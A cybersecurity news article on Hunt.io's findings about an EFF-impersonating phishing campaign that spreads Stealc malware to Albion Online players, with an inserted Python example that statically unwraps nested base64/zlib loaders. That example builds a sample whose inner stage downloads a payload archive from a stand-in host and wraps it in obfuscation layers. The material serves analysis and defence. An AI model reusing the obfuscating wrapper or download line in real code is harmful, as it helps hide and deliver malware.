
Cybersecurity researchers at Hunt.io have uncovered a targeted cybercriminal campaign impersonating the Electronic Frontier Foundation (EFF) to deceive and compromise Albion Online players. The attackers deployed decoy documents and phishing strategies to steal in-game assets, leveraging the Stealc malware and Pyramid C2 infrastructure to execute their operations.
The threat actors behind this campaign sought to exploit the player-driven economy of Albion Online, where in-game assets are exchanged for real money through third-party markets.
According to Hunt.io researchers: “Players on the game’s forum have reported receiving messages from other members directing them to phishing websites, with the EFF’s name used as a pretext to discuss the security of in-game goods tied to their accounts.”

The phishing messages lured victims into downloading what appeared to be PDF reports from the EFF, claiming that unauthorized transactions had occurred on their accounts. Once opened, the lure launched a malware infection chain designed to steal sensitive data.
On February 27, 2025, Hunt.io’s AttackCapture identified an open directory at http[:]//83.217.208[.]90/documents, which contained PowerShell scripts, ZIP archives, and files with double extensions posing as PDFs, a common indicator of malware staging.
Hunt.io’s analysis found that:
- The malware-hosting IP address shared an SSH host key with 11 other active servers on the Partner Hosting LTD network, a pivot that ties the hosts to a single operator.
- The server was flagged for hosting a Stealc C2, linking it to a larger cybercriminal network with at least 23 active command-and-control servers.
- Attackers distributed multiple phishing PDFs, including “Albion.pdf”, which masqueraded as an EFF report investigating virtual asset theft.
The attackers used forum-based phishing to reach their targets. Victims reported receiving messages from newly created accounts urging them to review their account security via links to malicious PDFs.
Hunt.io noted: “The phishing messages were actively circulating, aligning with findings from the open directory and leading to additional attacker-controlled infrastructure hosting decoy documents.”
Further analysis of the /albion directory revealed a Windows shortcut (LNK) file that executed a PowerShell script, which carried out the malware installation. The infection process included:
- Opening Albion.pdf as a decoy to distract the user while the malicious script ran in the background.
- Extracting and executing Python.zip, which contained a Python-based malware loader.
- Running 12.py, a heavily obfuscated script that executed nested payloads wrapped in zlib compression and Base64 encoding.
“The PowerShell code contains multiple comments in Russian, further supporting earlier indicators that Russian-speaking developers were involved in this operation,” Hunt.io explained.
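Loaders like the 12.py described above typically nest `exec(zlib.decompress(base64.b64decode(...)))` wrappers several layers deep so that the real payload is never visible on disk. The following is an added example, not code from the original report or from Hunt.io, showing how an analyst can strip such layers statically, without ever calling `exec`, and then pull network indicators out of the innermost stage. The wrapper pattern, the `wrap` builder used to construct the sample, and the sample URL (a TEST-NET address) are all assumptions made for the demonstration.

```python
import base64
import re
import zlib

# Regex for the assumed wrapper shape: exec(zlib.decompress(base64.b64decode("<b64>")))
WRAPPER_RE = re.compile(
    r'exec\(\s*zlib\.decompress\(\s*base64\.b64decode\(\s*'
    r'[bB]?["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)'
)

# Matches http(s) URLs so indicators can be harvested from the recovered stage.
URL_RE = re.compile(r'https?://[^\s\'"<>)]+')


def wrap(src: str, layers: int) -> str:
    """Build a constructed sample: wrap `src` in `layers` base64+zlib exec() shells.

    This exists only to produce test input; real loaders are built by the attacker.
    """
    for _ in range(layers):
        blob = base64.b64encode(zlib.compress(src.encode())).decode()
        src = f'exec(zlib.decompress(base64.b64decode("{blob}")))'
    return src


def peel(src: str, max_layers: int = 64) -> tuple[str, int]:
    """Statically remove base64+zlib exec() wrappers.

    Each layer is decoded and decompressed, never executed. Stops when no wrapper
    is found, when decoding fails, or after `max_layers` (guards against
    pathological inputs). Returns (innermost_source, layers_removed).
    """
    layers = 0
    while layers < max_layers:
        m = WRAPPER_RE.search(src)
        if not m:
            break
        try:
            src = zlib.decompress(base64.b64decode(m.group(1))).decode("utf-8", "replace")
        except (zlib.error, ValueError):
            # Corrupt or differently-encoded blob: keep what we have so far.
            break
        layers += 1
    return src, layers


def extract_urls(src: str) -> list[str]:
    """Return the distinct URLs found in a recovered stage, in order of appearance."""
    seen: list[str] = []
    for url in URL_RE.findall(src):
        if url not in seen:
            seen.append(url)
    return seen


# Constructed innermost stage (not the real 12.py): fetches a next-stage archive.
INNER_STAGE = (
    "import urllib.request\n"
    "urllib.request.urlretrieve('http://192.0.2.10/albion/Python.zip', 'Python.zip')\n"
)

# Constructed sample wrapped three layers deep, mimicking the nested zlib+base64 style.
SAMPLE = wrap(INNER_STAGE, 3)


def analyse(sample: str) -> dict:
    """Peel a sample and summarise what the analyst cares about."""
    inner, layers = peel(sample)
    return {"layers": layers, "inner": inner, "urls": extract_urls(inner)}


if __name__ == "__main__":
    result = analyse(SAMPLE)
    print(f"layers removed: {result['layers']}")
    print(f"indicators: {result['urls']}")
    print("--- innermost stage ---")
    print(result["inner"])
```

The search is deliberately a regex on the wrapper text rather than a call to `exec`: a sample whose innermost stage does anything unexpected is then still inert on the analyst's machine. The layer cap is there because a hostile sample can be wrapped arbitrarily deep, or can embed a zlib bomb; a real workflow would also bound the decompressed size.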
The malware campaign leveraged Pyramid C2, an open-source Python-based post-exploitation framework that delivers its modules as encrypted payloads, an approach intended to sidestep endpoint detection and response (EDR) tooling.
The final stage of the attack involved Stealc malware, a well-documented infostealer designed to:
- Extract stored credentials from Firefox and Chrome browsers.
- Steal session cookies to hijack user accounts.
- Exfiltrate stolen data to the C2 server over HTTP POST requests.